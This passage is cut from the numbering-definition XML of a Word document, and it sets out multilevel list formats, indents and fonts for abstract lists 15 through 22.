        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="904" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="904" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Book Antiqua" w:hAnsi="Book Antiqua" w:eastAsia="Book Antiqua" w:cs="Book Antiqua"/>
        <w:spacing w:val="-1"/>
        <w:w w:val="118"/>
        <w:sz w:val="26"/>
        <w:szCs w:val="26"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1055" w:hanging="852"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:cs="PMingLiU"/>
        <w:spacing w:val="-2"/>
        <w:w w:val="141"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1098" w:hanging="896"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:spacing w:val="-3"/>
        <w:w w:val="100"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2972" w:hanging="896"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3909" w:hanging="896"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4845" w:hanging="896"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5782" w:hanging="896"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6718" w:hanging="896"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="904" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="904" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Book Antiqua" w:hAnsi="Book Antiqua" w:eastAsia="Book Antiqua" w:cs="Book Antiqua"/>
        <w:spacing w:val="-1"/>
        <w:w w:val="118"/>
        <w:sz w:val="26"/>
        <w:szCs w:val="26"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1052" w:hanging="850"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:cs="PMingLiU"/>
        <w:spacing w:val="-2"/>
        <w:w w:val="141"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="910" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:w w:val="99"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2942" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3884" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4825" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5767" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6708" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="20">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="904" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="904" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Book Antiqua" w:hAnsi="Book Antiqua" w:eastAsia="Book Antiqua" w:cs="Book Antiqua"/>
        <w:spacing w:val="-1"/>
        <w:w w:val="118"/>
        <w:sz w:val="26"/>
        <w:szCs w:val="26"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1052" w:hanging="850"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:cs="PMingLiU"/>
        <w:spacing w:val="-2"/>
        <w:w w:val="141"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2733" w:hanging="850"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3570" w:hanging="850"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4407" w:hanging="850"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5244" w:hanging="850"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6080" w:hanging="850"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6917" w:hanging="850"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="19">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="18"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1631" w:hanging="600"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1631" w:hanging="600"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8012" w:hanging="600"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8084" w:hanging="600"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8157" w:hanging="600"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8229" w:hanging="600"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8301" w:hanging="600"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8374" w:hanging="600"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8446" w:hanging="600"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="18">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="17"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1630" w:hanging="600"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1630" w:hanging="600"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2216" w:hanging="692"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3635" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4343" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5051" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5759" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6467" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7175" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="17">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="16"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1631" w:hanging="600"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1631" w:hanging="600"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2216" w:hanging="692"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3635" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4343" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5051" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5759" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6467" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7175" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="16">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="15"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1630" w:hanging="600"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1630" w:hanging="600"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3030" w:hanging="600"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3725" w:hanging="600"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4420" w:hanging="600"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5115" w:hanging="600"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5810" w:hanging="600"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6505" w:hanging="600"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7200" w:hanging="600"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="15">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="14"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1631" w:hanging="600"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1631" w:hanging="600"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2216" w:hanging="692"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3016" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3812" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4609" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5405" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6202" w:hanging="692"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
